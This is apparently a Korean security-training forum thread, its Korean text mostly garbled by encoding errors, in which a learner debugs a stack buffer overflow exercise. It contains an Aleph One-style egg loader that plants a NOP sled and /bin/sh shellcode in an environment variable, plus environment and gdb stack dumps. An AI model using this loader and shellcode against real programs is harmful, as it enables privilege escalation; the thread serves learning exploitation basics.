   bmc12
   egg ȯ 帳ϴ.

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1681 []


putenv(egg)
putenv(buff)

̷ ȯ ߰

printenv

EGG ~~~~~
RET ~~~~~

̷ Ʒ ó ; ϴµ

ο printenvϸ 2 ° ó

RET
EGG
̷

ȯ  뿡 ׿

̷ ˷ֽø ϰڽϴ.

1.-----------------------------egg.c system(/bin/sh) -------------------------------------------
(ȯ溯 egg.c ҽ ߰ؼ Դϴ.)

Using address: 0xbffffbd4
LESSOPEN=|/usr/bin/lesspipe.sh %s
USERNAME=
HISTSIZE=1000
HOSTNAME=BOF
LOGNAME=student
REMOTEHOST=110.35.139.193
MAIL=/var/spool/mail/student
TERM=xterm
HOSTTYPE=i386
PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/student/bin
HOME=/home/student
INPUTRC=/etc/inputrc
SHELL=/bin/bash
USER=student
BASH_ENV=/home/student/.bashrc
LANG=en_US
OSTYPE=Linux
SHLVL=1
LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:
_=./e
EGG=1AF1U1E1EIe1A
                    [‹g1agu1OIeyyy/bin/sh
RET=OuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuy


2.----------------------------egg system(/bin/sh)߰ ȯ溯 -------------------------------

[student@BOF student]$ printenv

LESSOPEN=|/usr/bin/lesspipe.sh %s
USERNAME=
HISTSIZE=1000
HOSTNAME=BOF
LOGNAME=student
REMOTEHOST=110.35.139.193
MAIL=/var/spool/mail/student
TERM=xterm
HOSTTYPE=i386
PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/student/bin
HOME=/home/student
INPUTRC=/etc/inputrc
SHELL=/bin/bash
USER=student
RET=HnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHny
EGG=1AF1U1E1EIe1A
                    [‹g1agu1OIeyyy/bin/sh
BASH_ENV=/home/student/.bashrc
LANG=en_US
OSTYPE=Linux
SHLVL=5
LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:
_=/usr/bin/printenv


--------------------------------------egg.c ҽ-------------------------------------------------------------------

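/*
 * egg.c -- eggshell loader (Aleph One style), as pasted by the poster.
 *
 * Builds two environment strings and then spawns an interactive bash so
 * that every program started from that shell inherits them:
 *
 *   EGG=<NOP sled><shellcode>    eggsize bytes including "EGG=" and the NUL
 *   RET=<addr><addr><addr>...    bsize bytes including "RET=" and the NUL
 *
 * RET is meant to be copied over a vulnerable program's saved return
 * address; EGG is the code it should land in.
 *
 * argv[1] = bsize, argv[2] = offset, argv[3] = eggsize (all optional).
 * Exit status is 0 once the child shell exits, 1 on a usage/allocation
 * error (the posted version exited 0 on allocation failure too).
 *
 * NOTE(review): in the posted version `addr = get_esp() - offset;` is
 * commented out, so `addr` was never assigned -- the value printed and
 * copied into RET was an uninitialised read (undefined behaviour).  It is
 * now explicitly 0; restore the get_esp() line to get a real guess.
 *
 * NOTE(review): the two printenv dumps on this page show RET/EGG at a
 * different position in the child shell than in the process that called
 * putenv().  That is expected -- the bash started by system() hands its
 * own children an environment it builds from its own variable table, so
 * the order of the putenv() calls does not fix the layout a grandchild
 * sees, and the absolute stack address of EGG shifts with every variable
 * or argument added (compare the gdb dump further down).  Presumably that
 * is why the RET guess keeps missing; verify by dumping the target's
 * stack rather than the loader's.
 */
int main(int argc, char *argv[])
{
   char *buff, *ptr, *egg;
   long *addr_ptr, addr = 0;
   int offset = DEFAULT_OFFSET, bsize = DEFAULT_BUFFER_SIZE;
   int i, eggsize = DEFAULT_EGG_SIZE;
   size_t sclen, nops;

   if (argc > 1) bsize = atoi(argv[1]);
   if (argc > 2) offset = atoi(argv[2]);
   if (argc > 3) eggsize = atoi(argv[3]);
   (void)offset;   /* only consumed by the commented-out get_esp() line */

   /* "RET=" + at least one whole address + NUL.  atoi() returns 0 for
    * junk, which previously led to malloc(0) and a write to buff[-1]. */
   if (bsize < (int)(4 + sizeof addr + 1)) {
      fprintf(stderr, "bsize must be at least %d\n",
              (int)(4 + sizeof addr + 1));
      exit(1);
   }

   /* "EGG=" overwrites the first four NOPs, so the sled must hold at
    * least four bytes or the prefix clobbers the shellcode itself.  The
    * old `eggsize - strlen(shellcode) - 1` also wrapped around as size_t
    * when eggsize was too small and filled memory far past `egg`. */
   sclen = strlen(shellcode);
   if ((size_t)eggsize < sclen + 4 + 1) {
      fprintf(stderr, "eggsize must be at least %lu\n",
              (unsigned long)(sclen + 4 + 1));
      exit(1);
   }
   nops = (size_t)eggsize - sclen - 1;

   if (!(buff = malloc((size_t)bsize))) {
      printf("Can't allocate memory.\n");
      exit(1);
   }
   if (!(egg = malloc((size_t)eggsize))) {
      printf("Can't allocate memory.\n");
      exit(1);
   }

   /* addr = get_esp() - offset;   -- commented out in the posted version */
   printf("Using address: 0x%lx\n", addr);   /* %lx: addr is a long, not an int */

   /* Fill buff with the return address one whole long at a time.  The
    * posted loop stepped 4 bytes at a time up to bsize and therefore wrote
    * past the end of buff whenever bsize was not a multiple of the step. */
   addr_ptr = (long *) buff;
   for (i = 0; i + (int)sizeof addr <= bsize; i += (int)sizeof addr)
      *(addr_ptr++) = addr;

   /* NOP sled followed by the shellcode bytes. */
   ptr = egg;
   for (i = 0; (size_t)i < nops; i++)
      *(ptr++) = NOP;
   for (i = 0; (size_t)i < sclen; i++)
      *(ptr++) = shellcode[i];

   buff[bsize - 1] = '\0';
   egg[eggsize - 1] = '\0';

   /* The variable names overwrite the first four bytes of each buffer.
    * putenv() keeps a pointer to these strings rather than copying them,
    * so buff and egg must stay allocated (never freed) for the life of
    * the process. */
   memcpy(egg, "EGG=", 4);
   putenv(egg);
   memcpy(buff, "RET=", 4);
   putenv(buff);

   /* Spawn the shell whose children inherit EGG and RET. */
   system("/bin/bash");
   return 0;
}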






------------------------------------ÿ ȯ ------------------------------------------------

0xbffff2a2:      "i686"
0xbffff2a7:      "/home/student/get"
0xbffff2b9:      "LESSOPEN=|/usr/bin/lesspipe.sh %s"
0xbffff2db:      "USERNAME="
0xbffff2e5:      "HISTSIZE=1000"
0xbffff2f3:      "HOSTNAME=BOF"
0xbffff300:      "LOGNAME=student"
0xbffff310:      "REMOTEHOST=110.35.139.193"
0xbffff32a:      "MAIL=/var/spool/mail/student"
0xbffff347:      "TERM=xterm"
---Type <return> to continue, or q <return> to quit---
0xbffff352:      "HOSTTYPE=i386"
0xbffff360:      "PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/student/bin"
0xbffff3a3:      "HOME=/home/student"
0xbffff3b6:      "INPUTRC=/etc/inputrc"
0xbffff3cb:      "SHELL=/bin/bash"
0xbffff3db:      "USER=student"
0xbffff3e8:      "RET=XuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuy"...
0xbffff4b0:      "XuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuy"...
0xbffff578:      "XuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuy"
0xbffff5e8:      "EGG=", '\220' <repeats 196 times>...
0xbffff6b0:      '\220' <repeats 200 times>...
0xbffff778:      '\220' <repeats 200 times>...
0xbffff840:      '\220' <repeats 200 times>...
0xbffff908:      '\220' <repeats 200 times>...
0xbffff9d0:      '\220' <repeats 200 times>...
0xbffffa98:      '\220' <repeats 200 times>...
0xbffffb60:      '\220' <repeats 200 times>...
0xbffffc28:      '\220' <repeats 200 times>...
0xbffffcf0:      '\220' <repeats 200 times>...
0xbffffdb8:      "1AF1U1E1EI\200e\0251A\013[\211\037\213g\0041a\211g\004\211u1OI\200eyyy/bin/sh"
0xbffffde8:      "BASH_ENV=/home/student/.bashrc"
0xbffffe07:      "LANG=en_US"
0xbffffe12:      "OSTYPE=Linux"
0xbffffe1f:      "SHLVL=3"
0xbffffe27:      "LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01"...
0xbffffeef:      ";32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;3"...
0xbfffffb7:      "5:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:"
0xbfffffea:      "/home/student/get"






    
bmc12 ߰ ϳ ־ øϴ.

α׷ ÿ Ʒó ȯ溯,argv[],argc,ret ... δٰ ˰ ֽϴ.

׷ٸ

egg.c get_esp()

movl %esp,%eax

κ eaxͿ ٴ̶ Ͻôµ ü ٴ̶ ϴ°ǰ?

ȯ ̱ ϴ ϴ ǰ?

esp Ű κ Ʒ κΰǰ?

0xc0000000
|ȯ溯|
|argv[]|
|argc |
|ret |



2013/05/28  
bmc12 ׽Ʈ غ

ȯ溯 ϴ ϴ.

export ȯ Ŵ => ǥϿϴ.

ȯ Է Դϴ.

[student@BOF student]$ export C=1
[student@BOF student]$ export B=2
[student@BOF student]$ export A=3
[student@BOF student]$ export AA=4
[student@BOF student]$ export EGG=5


USERNAME=
=>AA=4
HISTSIZE=1000
HOSTNAME=BOF
LOGNAME=student
REMOTEHOST=110.35.139.193
MAIL=/var/spool/mail/student
TERM=xterm
HOSTTYPE=i386
PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/student/bin
HOME=/home/student
INPUTRC=/etc/inputrc
SHELL=/bin/bash
USER=student
=>A=3
=>B=2
=>C=1
=>EGG=5
BASH_ENV=/home/student/.bashrc
LANG=en_US
OSTYPE=Linux
SHLVL=1
LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:
_=/usr/bin/printenv
2013/05/28  
bmc12 Ѵص ذ Ȱ׿..

߰ Է ȴĵ

EGG

RET ٲ ʾƾϴ°ǵ..

......
2013/05/28  
qkrwncks593 ٴ EBP Ͱ Ű° ٴ̶θ־.
ȯ溯 ġ RET Ʒ ġմϴ.
׸ ESP Ű° Դϴ.
2013/06/01  